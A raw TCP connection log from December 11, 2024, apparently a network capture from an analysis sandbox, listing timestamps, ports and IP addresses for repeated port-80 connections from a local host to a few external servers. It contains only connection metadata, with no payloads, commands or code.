Dec 11, 2024 11:29:17.310621977 CET	80	49714	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:17.310827017 CET	49714	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:17.311166048 CET	49714	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:17.430489063 CET	80	49714	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:18.416271925 CET	80	49714	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:18.416594028 CET	49714	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:18.417280912 CET	80	49714	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:18.417356014 CET	49714	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:18.417546034 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:18.535995960 CET	80	49714	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:18.536818027 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:18.537636995 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:18.538021088 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:18.657259941 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:18.657406092 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:18.777507067 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.777371883 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.777470112 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.777481079 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.777533054 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:19.777764082 CET	49715	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:19.779202938 CET	49722	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:19.897191048 CET	80	49715	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.898448944 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:19.898566008 CET	49722	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:19.898974895 CET	49722	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:20.019660950 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:21.139556885 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:21.139596939 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:21.139638901 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:21.139748096 CET	49722	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:21.157259941 CET	49722	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:21.276712894 CET	80	49722	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:26.160058022 CET	49739	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:26.279346943 CET	80	49739	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:26.279480934 CET	49739	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:26.279794931 CET	49739	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:26.401876926 CET	80	49739	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:27.468954086 CET	80	49739	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:27.468986034 CET	80	49739	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:27.469058037 CET	49739	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:27.469275951 CET	49739	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:27.470248938 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:27.588727951 CET	80	49739	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:27.589598894 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:27.589725018 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:27.589978933 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:27.709287882 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:27.713669062 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:27.832911968 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.824376106 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.824450016 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.824465990 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.824501038 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:28.824537039 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:28.824805021 CET	49740	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:28.826442957 CET	49746	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:28.944211960 CET	80	49740	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.945799112 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:28.945935965 CET	49746	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:28.946234941 CET	49746	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:29.065547943 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:30.188648939 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:30.188750029 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:30.188760996 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:30.188834906 CET	49746	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:30.189090967 CET	49746	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:30.308557034 CET	80	49746	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:35.191498995 CET	49762	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:35.310954094 CET	80	49762	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:35.313772917 CET	49762	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:35.314178944 CET	49762	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:35.434171915 CET	80	49762	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:36.414221048 CET	80	49762	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:36.414546013 CET	49762	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:36.415210009 CET	80	49762	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:36.415266991 CET	49762	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:36.415426970 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:36.533802986 CET	80	49762	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:36.534759998 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:36.534885883 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:36.583581924 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:36.703111887 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:36.703224897 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:36.823390961 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.774983883 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.775005102 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.775018930 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.775156975 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:37.775476933 CET	49763	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:37.776850939 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:37.894694090 CET	80	49763	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.896292925 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:37.896476030 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:37.896727085 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:38.016009092 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:39.135886908 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:39.135961056 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:39.136006117 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:39.136055946 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:39.136092901 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:39.136311054 CET	49768	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:39.255569935 CET	80	49768	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:44.128688097 CET	49784	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:44.248049974 CET	80	49784	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:44.248290062 CET	49784	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:44.252919912 CET	49784	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:44.372385025 CET	80	49784	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:45.343395948 CET	80	49784	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:45.343779087 CET	49784	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:45.343997002 CET	80	49784	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:45.344059944 CET	49784	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:45.344892979 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:45.463674068 CET	80	49784	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:45.464719057 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:45.464838028 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:45.465281963 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:45.584665060 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:45.584738016 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:45.704036951 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.704885960 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.704922915 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.704998016 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.705081940 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.705136061 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.705234051 CET	49785	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.706592083 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.825284958 CET	80	49785	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.827027082 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:46.827119112 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.831080914 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:46.951168060 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:48.064723969 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:48.064821005 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:48.064836979 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:48.064903021 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:48.064939976 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:48.065129042 CET	49790	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:48.184475899 CET	80	49790	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:53.066346884 CET	49806	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:53.185805082 CET	80	49806	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:53.185959101 CET	49806	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:53.186218023 CET	49806	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:53.305490017 CET	80	49806	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:54.283226013 CET	80	49806	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:54.283484936 CET	49806	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:54.283704996 CET	80	49806	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:54.283756971 CET	49806	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:54.284288883 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:54.402894974 CET	80	49806	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:54.403563976 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:54.403666973 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:54.403994083 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:54.523248911 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:54.523399115 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:54.643367052 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.641875029 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.641901970 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.641973972 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.642071009 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.642118931 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.642239094 CET	49811	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.643650055 CET	49814	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.761596918 CET	80	49811	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.762944937 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:55.763041973 CET	49814	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.763283968 CET	49814	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:55.882652998 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:57.008658886 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:57.008681059 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:57.008697033 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:57.008749962 CET	49814	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:57.009098053 CET	49814	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:57.128536940 CET	80	49814	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:02.019196987 CET	49830	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:02.138747931 CET	80	49830	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:02.141719103 CET	49830	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:02.141962051 CET	49830	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:02.261425972 CET	80	49830	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:03.238280058 CET	80	49830	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:03.238538027 CET	49830	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:03.239789009 CET	80	49830	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:03.239851952 CET	49830	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:03.357825994 CET	80	49830	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:03.683000088 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:03.802395105 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:03.802478075 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:03.802741051 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:03.921984911 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:03.922065973 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:04.041532993 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.037986994 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.038131952 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.038145065 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.038182020 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.038216114 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.038341045 CET	49836	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.039464951 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.157603025 CET	80	49836	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.158703089 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:05.158782959 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.159054995 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:05.278290987 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:06.416548967 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:06.416699886 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:06.416712046 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:06.416748047 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:06.416780949 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:06.416918039 CET	49839	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:06.536210060 CET	80	49839	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:11.410526991 CET	49854	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:11.530018091 CET	80	49854	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:11.530169010 CET	49854	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:11.530519962 CET	49854	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:11.650007963 CET	80	49854	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:12.627836943 CET	80	49854	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:12.628134012 CET	49854	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:12.629081964 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:12.629519939 CET	80	49854	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:12.629600048 CET	49854	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:12.747437954 CET	80	49854	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:12.748271942 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:12.748383999 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:12.750288010 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:12.869577885 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:12.869678020 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:12.992178917 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:13.997986078 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:13.998017073 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:13.998028040 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:13.998120070 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:13.998169899 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:13.998409033 CET	49859	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:13.999790907 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:14.117666006 CET	80	49859	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:14.119062901 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:14.119178057 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:14.119417906 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:14.239180088 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:15.358217001 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:15.358347893 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:15.358396053 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:15.358400106 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:15.358437061 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:15.358535051 CET	49863	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:15.477839947 CET	80	49863	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:20.348088980 CET	49878	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:20.467669964 CET	80	49878	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:20.467864037 CET	49878	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:20.468250990 CET	49878	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:20.589270115 CET	80	49878	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:21.563906908 CET	80	49878	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:21.564347982 CET	49878	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:21.564541101 CET	80	49878	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:21.564610958 CET	49878	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:21.565500975 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:21.684087992 CET	80	49878	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:21.685025930 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:21.685245037 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:21.685508966 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:21.805969954 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:21.806113005 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:21.925451040 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:22.922102928 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:22.922131062 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:22.922213078 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:22.922282934 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:22.922333002 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:22.922451973 CET	49881	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:22.923758984 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:23.041697025 CET	80	49881	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:23.043025970 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:23.043113947 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:23.043363094 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:23.163013935 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:24.282865047 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:24.282900095 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:24.282978058 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:24.283001900 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:24.283155918 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:24.285578966 CET	49886	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:24.404874086 CET	80	49886	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:29.311641932 CET	49902	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:29.430979013 CET	80	49902	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:29.431078911 CET	49902	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:29.431309938 CET	49902	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:29.551300049 CET	80	49902	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:30.531320095 CET	80	49902	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:30.533119917 CET	80	49902	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:30.533229113 CET	49902	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:30.533456087 CET	49902	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:30:30.534354925 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:30.652721882 CET	80	49902	172.67.74.152	192.168.2.5
Dec 11, 2024 11:30:30.653604031 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:30.653709888 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:30.653955936 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:30.773418903 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:30.773682117 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:30.892924070 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:31.897289991 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:31.897699118 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:31.897777081 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:31.897841930 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:31.897886992 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:31.898310900 CET	49904	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:31.948375940 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:32.017599106 CET	80	49904	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:32.067816019 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:32.067934990 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:32.068770885 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:32.191258907 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:33.307296991 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:33.307348013 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:33.307460070 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:33.307822943 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:33.307878971 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:33.307981968 CET	49909	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:33.429727077 CET	80	49909	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:38.453767061 CET	49925	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:38.573034048 CET	80	49925	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:38.573343992 CET	49925	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:38.573635101 CET	49925	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:38.692815065 CET	80	49925	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:39.670970917 CET	80	49925	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:39.671236992 CET	80	49925	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:39.671374083 CET	49925	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:39.671416044 CET	49925	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:39.672584057 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:39.790693045 CET	80	49925	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:39.791834116 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:39.791948080 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:39.796000004 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:40.143383980 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:40.301127911 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:40.301363945 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:40.301414013 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:40.420835972 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:41.419112921 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:41.419150114 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:41.419163942 CET	80	49927	167.99.38.229	192.168.2.5
